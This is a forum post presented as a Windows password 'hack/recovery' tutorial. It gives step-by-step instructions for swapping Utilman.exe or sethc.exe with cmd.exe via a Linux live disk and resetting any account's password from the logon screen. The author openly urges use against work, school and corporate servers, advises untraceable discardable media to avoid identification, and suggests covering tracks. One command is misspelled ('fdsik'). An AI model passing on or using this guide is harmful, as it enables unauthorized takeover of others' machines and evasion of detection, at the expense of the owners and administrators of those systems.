This site uses cookies! Learn More

This site uses cookies!

For providing our services, we do use cookies.
But get used, this is what most of modern web do!
However we have to warn you since we are obligated to so due to EU laws.

By continuing to use this site, you agree to allow us to store cookies on your computer. :)
And no, we will not eat your computer nor you will be able to eat those cookies :P

Sign in to follow this  
Followers 0
xZero

Windows account password hack/recovery [All versions]

2 posts in this topic


You forgot the password or maybe you want to sniff where you shouldn't? No problem! Microsoft is here to help you.
An old school trick, old as oldest Windows, still remains unfixed even on most modern Windows available, Windows 10. No, it's not even fixed in anniversary update (10.0.14393).... 

It's major security flaw, very easy to exploit, and users can't do ANYTHING to prevent, except mechanically locking their computer. (Nor that is bulletproof)

To make things even worse, no versions of Windows are secure, not even Windows Server editions! What a shame, Windows Server edition should be hardest to exploit, yet an old school trick will break it just as easy. Of course, that trick will hardly work from remote, but if you have psychical access, you're already in. 
Imagine hacking corporate server... Or your school servers.... Yeah, yeah, I know, it's not always easy to approach those machines, but believe me, I seen them easy to access on so many places. 

Your account at work place is limited? Use this method to hack admin password.

There is just one problem with using this method: You will not get to know password, you will reset it to whatever you like, even a blank password, so this method is not stealth. If you hack admin account on corporate server, they will probably go alert as soon as admin fails to login... Good thing is that you can always cover your tracks. If someone seen you, then you're probably screwed, but don't kill the witnesses! It's not worth it. 

 

Before we proceed, disclaimer

Following this tutorial is fully on your own responsibility. So if you get in jail, kill your cat, crash your car or whatever, it's ONLY YOUR responsibility.



So how do we do it?

You will need:

  1. Linux live distribution (One you can boot and use right ahead)
    How to
  2. CD/DVD, USB or any other media where you can put your OS from step 1. 
    For security concerns, would be wise to use an untraceable media, like CD/DVD which you can easily discard. Any USB drive may leave trace of it's serial number on affected machine, and it may lead directly to you (not always the case, but at least hide well)! 
    How to
     
  3. Machine you're going to use this on must allow you to boot CD/DVD/USB.
    Locked BIOS may be a problem, but if you have privacy and time, you can open machine and remove CMOS battery so BIOS configuration as well as password gets wiped clean
  4. Brain and common sense

Steps

  1. Before we begin, turn off properly Windows PC. Properly means Shut down. No hibernation. Hard power off may be option also, if you don't care about possible consequences that may have on PC (data corruption, disk failure), although serious consequences are rather very rare.
  2. Once your booted Linux live, go to file manager, and mount/open disk drive where Windows is located. If Linux won't mount or complains that drive is in unsafe state, then open terminal and type:
    sudo fdsik -l
    sudo mount -o force /dev/sdX /mnt 

    Make sure to change sdX to whatever identifier Windows partition has. You'll get that info with first command.

  3. Locate file Utilman.exe
  4. Rename it to Utilman0.exe 
  5. Duplicate/copy cmd.exe and rename it's copy to Utilman.exe
  6. Shutdown linux
  7. Boot windows
  8. At the logon screen press Win + U
  9. Command prompt will appear. Type:
    net user YourOrVictimsPreciousUsername newpassword

    Instead on newpassword you can leave blank, then Windows will ask for new password and you don't have to type in anything which Windows will treat as no password.

  10. Now boot back to Linux, repeat all the steps until step 3.

  11. Locate and delete Utilman.exe

  12. Locate and rename Utilman0.exe to Utilman.exe 

  13. Done!

What we done? We swapped  accessibility menu which is available at logon with command prompt (cmd.exe). That way when we press Win + U, we trick windows into executing elevated permissions(administrator) command prompt.

Instead of linux, there are also other methods to boot and do steps we did, but this one is tested.

There is also tool called chntpw which is available as standalone bootable image or as a tool for Linux. It's much simpler, however I discourage use of it as it doesn't support all versions of Windows and also it may damage/affect other user accounts. 

 




Tips:

  • If you know how to use Linux terminal, all above steps could be done in half of the time.
  • If Utilman.exe method doesn't work, eg. keyboard doesn't have Win button, you can do all the steps, but instead of hacking Utilman.exe use sethc.exe. Then on logon screen repeatedly press Shift until command prompt appears. sethc.exe is application executed upon annoying Sticky key(shift) function. If sticky key is disabled, this not gonna work, but you could theoretically swap command prompt with any other application which is bind to some key combo.

 

Happy hacking!
 

 





 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0